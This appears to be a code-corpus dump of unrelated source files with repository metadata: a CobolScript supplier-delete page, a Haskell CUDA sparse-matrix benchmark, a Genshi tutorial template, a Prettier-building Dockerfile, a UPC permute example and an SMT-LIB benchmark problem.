persistence-modules/spring-data-jpa-repo/src/main/resources/import_entities.sql
[ "MIT" ]
data division. linkage section. 01 require. 01 request. 01 response. procedure division. local mysql. perform require using "mysql" giving mysql. local id. move id in query in request to id. local connection. perform delete-supplier. delete-supplier section. local options. move object to options. move "root" to user in options. move "" to password in options. move "cobolscriptwebsite" to database in options. perform createConnection in mysql using options giving connection. perform connect in connection. local datavalues. move array to datavalues. perform push in datavalues using id. perform query in connection using "delete from suppliers where Id = ?" datavalues delete-end. delete-end section using err, result. if err then display "Error". stop run. end-if. local headers. move object to headers. move "/supplier" to headers("Location"). perform writeHead in response using 302 headers. perform end in connection. stop run.
COBOL
3
jmptrader/CobolScript
samples/website/pages/supplierDelete.cob
[ "MIT" ]
{-# LANGUAGE ForeignFunctionInterface #-} -------------------------------------------------------------------------------- -- -- Module : SMVM -- Copyright : (c) 2009 Trevor L. McDonell -- License : BSD -- -- Sparse-matrix dense-vector multiplication -- -------------------------------------------------------------------------------- module Main where #include "smvm.h" -- Friends import Time import C2HS import RandomVector (randomList,randomListR,verifyList) -- System import Numeric import Data.List import Control.Monad import Control.Applicative import System.Random import Foreign.CUDA (withDevicePtr) import qualified Foreign.CUDA as CUDA -- -- A very simple sparse-matrix / vector representation -- (confusingly, different from that in RandomVector and used elsewhere) -- type Vector e = [e] type SparseVector e = [(Int,e)] type SparseMatrix e = [SparseVector e] -------------------------------------------------------------------------------- -- Reference -------------------------------------------------------------------------------- smvm :: Num e => SparseMatrix e -> Vector e -> Vector e smvm sm v = [ sum [ x * (v!!col) | (col,x) <- sv ] | sv <- sm ] -------------------------------------------------------------------------------- -- CUDA -------------------------------------------------------------------------------- -- -- Sparse-matrix vector multiplication, using compressed-sparse row format. -- -- Lots of boilerplate to copy data to the device. Our simple list -- representation has atrocious copy performance (see the `bandwidthTest' -- example), so don't include that in the benchmarking -- smvm_csr :: SparseMatrix Float -> Vector Float -> IO (Float, Vector Float) smvm_csr sm v = let matData = concatMap (map cFloatConv . snd . unzip) sm colIdx = concatMap (map cIntConv . fst . unzip) sm rowPtr = scanl (+) 0 (map (cIntConv . length) sm) v' = map cFloatConv v #ifdef __DEVICE_EMULATION__ iters = 1 #else iters = 100 #endif in CUDA.withListArray matData $ \d_data -> CUDA.withListArray rowPtr $ \d_ptr -> CUDA.withListArray colIdx $ \d_indices -> CUDA.withListArrayLen v' $ \num_rows d_x -> CUDA.allocaArray num_rows $ \d_y -> do (t,_) <- benchmark iters (smvm_csr_f d_y d_x d_data d_ptr d_indices num_rows) CUDA.sync y <- map cFloatConv <$> CUDA.peekListArray num_rows d_y return (fromInteger (timeIn millisecond t) / fromIntegral iters, y) {# fun unsafe smvm_csr_f { withDevicePtr* `CUDA.DevicePtr CFloat' , withDevicePtr* `CUDA.DevicePtr CFloat' , withDevicePtr* `CUDA.DevicePtr CFloat' , withDevicePtr* `CUDA.DevicePtr CUInt' , withDevicePtr* `CUDA.DevicePtr CUInt' , `Int' } -> `()' #} -- -- Sparse-matrix vector multiplication from CUDPP -- smvm_cudpp :: SparseMatrix Float -> Vector Float -> IO (Float, Vector Float) smvm_cudpp sm v = let matData = concatMap (map cFloatConv . snd . unzip) sm colIdx = concatMap (map cIntConv . fst . unzip) sm rowPtr = scanl (+) 0 (map (cIntConv . length) sm) v' = map cFloatConv v #ifdef __DEVICE_EMULATION__ iters = 1 #else iters = 100 #endif in CUDA.withListArrayLen v' $ \num_rows d_x -> CUDA.allocaArray num_rows $ \d_y -> withArrayLen matData $ \num_nonzeros h_data -> withArray rowPtr $ \h_rowPtr -> withArray colIdx $ \h_colIdx -> do (t,_) <- benchmark iters (smvm_cudpp_f d_y d_x h_data h_rowPtr h_colIdx num_rows num_nonzeros) CUDA.sync y <- map cFloatConv <$> CUDA.peekListArray num_rows d_y return (fromInteger (timeIn millisecond t) / fromIntegral iters, y) {# fun unsafe smvm_cudpp_f { withDevicePtr* `CUDA.DevicePtr CFloat' , withDevicePtr* `CUDA.DevicePtr CFloat' , id `Ptr CFloat' , id `Ptr CUInt' , id `Ptr CUInt' , `Int' , `Int' } -> `()' #} -------------------------------------------------------------------------------- -- Main -------------------------------------------------------------------------------- -- -- Generate random matrices -- sparseMat :: (Num e, Random e, Storable e) => (Int,Int) -> (Int,Int) -> IO (SparseMatrix e) sparseMat bnds (h,w) = replicateM h sparseVec where sparseVec = do nz <- randomRIO bnds -- number of non-zero elements idx <- nub . sort <$> randomListR nz (0,w-1) -- remove duplicate column indices zip idx <$> randomList (length idx) -- (column indices don't actually need to be sorted) denseMat :: (Num e, Random e, Storable e) => (Int,Int) -> IO (SparseMatrix e) denseMat (h,w) = replicateM h (zip [0..] <$> randomList w) -- -- Some test-harness utilities -- stats :: (Floating a, Ord a) => [a] -> (a,a,a,a,a,a) stats (x:xs) = finish . foldl' stats' (x,x,x,x*x,1) $ xs where stats' (mn,mx,s,ss,n) v = (min v mn, max v mx, s+v, ss+v*v, n+1) finish (mn,mx,s,ss,n) = (mn, mx, av, var, stdev, n) where av = s/n var = (1/(n-1))*ss - (n/(n-1))*av*av stdev = sqrt var testAlgorithm :: (Num e, Ord e, Floating e) => String -- name of the algorithm -> (SparseMatrix e -> Vector e -> IO (Float, Vector e)) -- return time (ms), and result -> SparseMatrix e -- input matrix -> Vector e -- input vector -> Vector e -- reference solution -> IO () testAlgorithm name f m v ref = do putStr name (t,y) <- f m v putStr $ if verifyList ref y then "Ok! " else "INVALID! " putStr $ "( " ++ showFFloat (Just 2) t " ms, " putStrLn $ showFFloat (Just 2) (fromIntegral (2 * 1000 * sum (map length m)) / (t * 1E9)) " GFLOPS )" testMatrix :: String -> SparseMatrix Float -> Vector Float -> IO () testMatrix name sm v = do let w = length v (_,_,av,_,stdev,h) = stats (map (fromIntegral . length) sm) ref = smvm sm v putStr $ name ++ ": " ++ show w ++ "x" ++ show (round h) putStr $ ", " ++ shows (round (av*h)) " non-zero elements " putStrLn $ "( " ++ showFFloat (Just 2) av " +/- " ++ showFFloat (Just 2) stdev " )" testAlgorithm " smvm-csr: " smvm_csr sm v ref testAlgorithm " smvm-cudpp: " smvm_cudpp sm v ref putStrLn "" -- -- Finally, the main function -- main :: IO () main = do dev <- CUDA.get props <- CUDA.props dev putStrLn $ "Using device " ++ show dev ++ ": \"" ++ CUDA.deviceName props ++ "\"" putStrLn $ " Compute capability: " ++ show (CUDA.computeCapability props) putStrLn $ " Total global memory: " ++ showFFloat (Just 2) (fromIntegral (CUDA.totalGlobalMem props) / (1024*1024) :: Double) " GB\n" v1 <- randomList 512 v2 <- randomList 2048 m1 <- denseMat (512,512) m2 <- sparseMat (20,200) (20 * 2048,2048) testMatrix "Dense Matrix" m1 v1 testMatrix "Sparse Matrix" m2 v2
C2hs Haskell
5
flowbox-public/cuda
examples/src/smvm/SMVM.chs
[ "BSD-3-Clause" ]
<!DOCTYPE html> <html xmlns:py="http://genshi.edgewall.org/"> <head> <meta content="text/html; charset=utf-8" http-equiv="content-type" /> <title>OpenGLContext Python Tutorials</title> <link rel="stylesheet" href="../style/modern.css" type="text/css" /> <link rel="stylesheet" href="../style/tutorial.css" type="text/css" /> </head> <body> <header> <nav> <ul class="menu"> <li><a href="/context/index.html">OpenGLContext</a></li> <li><a href="/context/documentation/index.html">Docs</a></li> </ul> </nav> <h1>OpenGLContext Python Tutorials</h1> </header> <div py:def="path_children(path)" py:for="tutorial in path.children" class="tutorial"> <a href="${tutorial.relative_link}" class="tutorial-link">${ tutorial.title }</a> </div> <section class="path"> <?python path = paths[0] ?> <h2 class="path-name">Introduction to Shaders (Lighting)</h2> <div class="path-body"> <div class="introduction">This is a low-level introductory tutorial path. It is intended for those who have either never done 3D graphics with OpenGL, or who have only done "legacy" OpenGL rendering (i.e. you learned OpenGL before about 2007). It walks through the development of low-level code to perform Blinn-Phong rendering of DirectionalLights, PointLights and SpotLights as well as the basics of geometric rendering (with Vertex Buffer Objects). </div> ${path_children( path )} </div> </section> <section class="path"> <?python path = paths[1] ?> <h2 class="path-name">${path.text}</h2> <div class="path-body"> <div class="introduction">This is a high-level introductory tutorial path. It is intended to introduce the OpenGLContext/VRML97 scenegraph engine. It demonstrates more involved rendering tasks, but with far less detail than the Introduction to Shaders tutorial. It does not attempt to describe how the effects are achieved, just how to achieve them. </div> ${path_children( path )} </div> </section> <section class="path"> <?python path = paths[2] ?> <h2 class="path-name">${path.text}</h2> <div class="path-body"> <div class="introduction">These tutorials describe how to setup modern shadow-map-based shadow-casting. These are fairly advanced tutorials which assume you are comfortable with OpenGL. </div> ${path_children( path )} </div> </section> <section class="path"> <?python path = paths[3] ?> <h2 class="path-name">${path.text}</h2> <div class="path-body"> <div class="introduction">These tutorials are translations of the famous "NeHe" series of tutorials. These are low-level introductory tutorials which generally use the legacy OpenGL API. The linked original tutorials are very gentle and thorough. </div> ${path_children( path )} </div> </section> <section class="path" py:for="path in paths[4:]"> <h2 class="path-name">${path.text}</h2> <div class="path-body"> ${path_children( path )} </div> </section> <footer> <nav> <ul class="menu"> <li><a href="/context/index.html">OpenGLContext</a></li> <li><a href="/context/documentation/index.html">Docs</a></li> </ul> </nav> <div class="metadata">This document was generated from OpenGLContext ${version} on ${date}</div> <div class="clear-both"></div> </footer> </body> </html>
Genshi
4
t20100/pyopengl
directdocs/templates/tutorialindex.kid
[ "BSD-2-Clause", "MIT" ]
FROM node:current RUN npm i -g yarn --force RUN git clone --depth 1 https://github.com/prettier/prettier.git /prettier WORKDIR /prettier COPY --from=typescript/typescript /typescript/typescript-*.tgz /typescript.tgz RUN mkdir /typescript RUN tar -xzvf /typescript.tgz -C /typescript RUN yarn add typescript@/typescript.tgz RUN yarn ENTRYPOINT [ "yarn" ] # Build CMD [ "build" ]
Dockerfile
4
monciego/TypeScript
tests/cases/docker/prettier/Dockerfile
[ "Apache-2.0" ]
/******************************************************************* This file provides an example usage of upc_all_permute collective function as described in Section 7.3.1.6 in the UPC Spec v1.2. ********************************************************************/ #include <upc.h> #include <upc_collective.h> #define NELEMS 10 shared [NELEMS] int A[NELEMS*THREADS], B[NELEMS*THREADS]; shared int P[THREADS]; int main() { int i; upc_forall(i=0;i<NELEMS*THREADS;i++;&A[i]) A[i] = MYTHREAD; P[MYTHREAD] = (MYTHREAD+1)%THREADS; upc_barrier; upc_all_permute( B, A, P, sizeof(int)*NELEMS, UPC_IN_NOSYNC | UPC_OUT_NOSYNC ); upc_barrier; return 0; }
Unified Parallel C
4
maurizioabba/rose
tests/CompileTests/UPC_tests/upc_all_permute_ex.upc
[ "BSD-3-Clause" ]
(set-info :smt-lib-version 2.6) (set-logic QF_UF) (set-info :source | Generated by: Aman Goel ([email protected]), Karem A. Sakallah ([email protected]) Generated on: 2018-04-06 Generated by the tool Averroes 2 (successor of [1]) which implements safety property verification on hardware systems. This SMT problem belongs to a set of SMT problems generated by applying Averroes 2 to benchmarks derived from [2-5]. A total of 412 systems (345 from [2], 19 from [3], 26 from [4], 22 from [5]) were syntactically converted from their original formats (using [6, 7]), and given to Averroes 2 to perform property checking with abstraction (wide bit-vectors -> terms, wide operators -> UF) using SMT solvers [8, 9]. [1] Lee S., Sakallah K.A. (2014) Unbounded Scalable Verification Based on Approximate Property-Directed Reachability and Datapath Abstraction. In: Biere A., Bloem R. (eds) Computer Aided Verification. CAV 2014. Lecture Notes in Computer Science, vol 8559. Springer, Cham [2] http://fmv.jku.at/aiger/index.html#beem [3] http://www.cs.cmu.edu/~modelcheck/vcegar [4] http://www.cprover.org/hardware/v2c [5] http://github.com/aman-goel/verilogbench [6] http://www.clifford.at/yosys [7] http://github.com/chengyinwu/V3 [8] http://github.com/Z3Prover/z3 [9] http://github.com/SRI-CSL/yices2 id: sw_ball2004_1 query-maker: "Yices 2" query-time: 0.001000 ms query-class: abstract query-category: oneshot query-type: regular status: unsat |) (set-info :license "https://creativecommons.org/licenses/by/4.0/") (set-info :category "industrial") ; (set-info :status unsat) (declare-fun y$117 () Bool) (declare-fun y$127 () Bool) (declare-fun y$131 () Bool) (declare-fun y$2 () Bool) (declare-fun y$4 () Bool) (declare-fun y$6 () Bool) (declare-fun y$8 () Bool) (declare-fun y$L0 () Bool) (declare-fun y$L1 () Bool) (declare-fun y$L2 () Bool) (declare-fun y$L3 () Bool) (declare-fun y$L4 () Bool) (declare-fun y$LoneHot () Bool) (declare-fun y$prop () Bool) (assert (= y$L1 (not y$2))) (assert (= y$L2 (not y$4))) (assert (= y$L3 (not y$6))) (assert (= y$L4 (not y$8))) (assert (= y$prop (not y$127))) (assert (= y$117 (= y$6 y$prop))) (assert (= y$131 (and y$L0 y$2 y$4 y$6 y$8 y$LoneHot y$127 y$117))) (assert y$131) (check-sat) (exit)
SMT
3
livinlife6751/infer
sledge/test/smt/QF_UF/2018-Goel-hwbench/QF_UF_sw_ball2004_1_ab_reg_max.smt2
[ "MIT" ]